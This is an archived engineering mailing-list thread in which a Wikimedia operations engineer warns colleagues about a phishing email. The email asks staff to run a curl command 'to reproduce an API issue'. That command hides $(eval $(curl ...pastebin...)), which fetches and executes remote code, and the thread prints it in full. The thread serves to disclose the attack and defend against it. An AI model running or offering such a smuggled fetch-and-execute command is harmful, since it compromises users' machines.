[Engineering] PLEASE READ: (unsuccesful) compromise attempt

Aeryn Palmer apalmer at wikimedia.org
Thu Jun 15 19:25:19 UTC 2017 

Hi All,

Just a note - the claims in the message some of us got this morning have
already been examined and found to be a false alarm. Should have checked
before I sent this email. Thanks, all!

Cheers,

Aeryn

On Thu, Jun 15, 2017 at 12:15 PM, Aeryn Palmer <apalmer at wikimedia.org>
wrote:

> This appears to be from the same person who sent the email earlier this
> morning about an alleged leak, to whom Chad responded. Did anyone click the
> link they provided in that email?
>
> Cheers,
>
> Aeryn
>
> On Thu, Jun 15, 2017 at 12:12 PM, Faidon Liambotis <faidon at wikimedia.org>
> wrote:
>
>> Hi,
>>
>> DO NOT RUN THE COMMAND BELOW. Please read this email in full.
>>
>> I just got an email, foundd below, which seems initially legitimate, but
>> on a more careful read is malicious and an attempt to compromise my
>> computer. Thankfully I don't have the habit of copy/pasting commands on
>> my terminal and I read this email carefully, so I was not a victim of
>> this.
>>
>> The email seems innocuous enough, by mentioning my name and an otherwise
>> legitimate body pointing an API issue with a URL that looks like an
>> api.php URL of ours. It suggests running a curl to reproduce, but if you
>> look more carefully, that curl has $(eval $(curl
>> https://pastebin.com/raw/xSWbdNAK) in it.
>>
>> That pastebin URL above contains an exec() of a base64 string, which, in
>> turn, decoded, is a Python script that fetches and exec()s the contents
>> of a URL. I have NOT fetched that URL yet, so I don't know what the
>> contents are.  I'd advise to not do that either, unless done carefully
>> from a sandboxed, unprivileged environment. It will also likely let the
>> attacker know that someone accessed it, and possibly let them know that
>> we're on to them.
>>
>> Please be on the lookout for similar attempts, and let security@ and ops
>> know immediately if you get similar ones, or if you are suspicious of
>> any other emails or weird behavior on your computer. Please also let us
>> know IMMEDIATELY if you suspect you fell victim of one of these attacks.
>> Make sure to confirm that your message was received. If in doubt, call
>> me or other opsens on our cellphones, as found on officewiki's
>> Contact_list.
>>
>> We also had a targeted phising attempt last week, by someone pertaining
>> to be Katherine and attempting to extract donor data, so it's possible
>> it's the same person trying a different angle. They may try another
>> angles as well, so I'd advise everyone to be vigilant.
>>
>> Best,
>> Faidon
>> --
>> Faidon Liambotis
>> Principal Operations Engineer
>> Wikimedia Foundation
>>
>>
>>
>> ----- Forwarded message from Joshua Wilson <joshuaswillson at gmail.com>
>> -----
>>
>> Date: Thu, 15 Jun 2017 10:45:35 -0700
>> From: Joshua Wilson <joshuaswillson at gmail.com>
>> To: fliambotis at wikimedia.org
>> Subject: Wikipedia REST API Issues
>>
>> Greetings Faidon,
>>
>>
>> It seems as if the api `query` endpoint at the English Wikipedia is down.
>> A
>> simple "hello"
>> api call as shown below responds with an internal server error. Further
>> calls to the same
>> endpoint result in the request timing out, until the endpoint is reachable
>> again.
>>
>> [added by faidon: DO NOT RUN THIS COMMAND]
>> curl https://en.wikipedia.org/w/api.php?action=query\&titles=$(eval
>> $(curl
>> https://pastebin.com/raw/xSWbdNAK)
>> \\\&)Main%20Page\&prop=revisions\&rvprop=content\&format=json
>> [added by faidon: DO NOT RUN THIS COMMAND]
>>
>> I'm interested in using english wikipedia data for some AI language
>> comprehension research.
>>
>> If you could take a look, and possibly let me know if/when this service
>> will be up, I would
>> greatly appreciate it. I couldn't find any scheduled downtime information
>> online, so I apologize
>> if this behavior is expected.
>>
>> Thanks,
>>
>> Chelsea Anders
>>
>> ----- End forwarded message -----
>>
>
>
>
> --
> Aeryn Palmer
> Legal Counsel
> Wikimedia Foundation
> 149 New Montgomery Street, 6th Floor
> San Francisco, CA 94105
> apalmer at wikimedia.org
> 415.839.6885 <(415)%20839-6885> (Office)
> 415.882.0495 <(415)%20882-0495> (Fax)
> *California Registered In-House Counsel*
>
> *NOTICE: This message may be confidential or legally privileged. If you
> have received it by accident, please delete it and let us know about the
> mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
> reasons, I cannot give legal advice to, or serve as a lawyer for, community
> members, volunteers, or staff members in their personal capacity. For more
> on what this means, please see our legal disclaimer
> <https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
>



-- 
Aeryn Palmer
Legal Counsel
Wikimedia Foundation
149 New Montgomery Street, 6th Floor
San Francisco, CA 94105
apalmer at wikimedia.org
415.839.6885 (Office)
415.882.0495 (Fax)
*California Registered In-House Counsel*

*NOTICE: This message may be confidential or legally privileged. If you
have received it by accident, please delete it and let us know about the
mistake. As an attorney for the Wikimedia Foundation and for legal/ethical
reasons, I cannot give legal advice to, or serve as a lawyer for, community
members, volunteers, or staff members in their personal capacity. For more
on what this means, please see our legal disclaimer
<https://meta.wikimedia.org/wiki/Wikimedia_Legal_Disclaimer>.*
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.wikimedia.org/pipermail/engineering/attachments/20170615/0c68be2d/attachment-0001.html>

More information about the Engineering mailing list